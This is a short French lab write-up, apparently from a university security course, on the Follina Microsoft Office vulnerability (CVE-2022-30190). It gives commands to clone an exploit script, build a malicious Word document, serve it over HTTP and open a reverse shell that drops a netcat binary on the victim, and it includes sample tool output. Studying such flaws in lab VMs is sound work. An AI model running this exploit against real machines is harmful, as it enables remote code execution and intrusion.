Follina (CVE-2022-30190) est une vulnérabilité zero-day de Microsoft Office qui a été récemment découverte. C'est une vulnérabilité de gravité élevée que les pirates peuvent exploiter pour des attaques d'exécution de code à distance (RCE).
Amine TITROFINE | 17 décembre 2022
Follina (CVE-2022-30190) est une vulnérabilité zero-day de Microsoft Office récemment découverte. Il s'agit d'une vulnérabilité de haute sévérité que les pirates peuvent exploiter pour des attaques d'exécution de code à distance (RCE). Elle se produit lorsque MSDT est appelé via le protocole URL depuis une application appelante telle que Word. Un attaquant qui exploite avec succès cette vulnérabilité peut exécuter du code arbitraire avec les privilèges de l'application appelante. L'attaquant peut ensuite installer des programmes, afficher, modifier ou supprimer des données, ou créer de nouveaux comptes dans le contexte autorisé par les droits de l'utilisateur.
2 VMs :
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
Après avoir exécuté le programme follina.py, un fichier ( follina.doc ) apparaîtra, contenant un script malveillant .
Afin de faciliter le partage de fichiers entre les deux VMs, nous utiliserons un serveur HTTP Python.
$ python3 –m http.server 8080
Obtenir un reverse shell sur le port 9999. Remarque : ceci télécharge un binaire netcat sur la victime et le place dans C:\Windows\Tasks. Il ne nettoie pas le binaire. Cela déclenchera des détections antivirus sauf si l'antivirus est désactivé.
$ python3 follina.py -r 9999
Lancer calc.exe :
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Lancer notepad.exe :
$ python3 follina.py -c "notepad"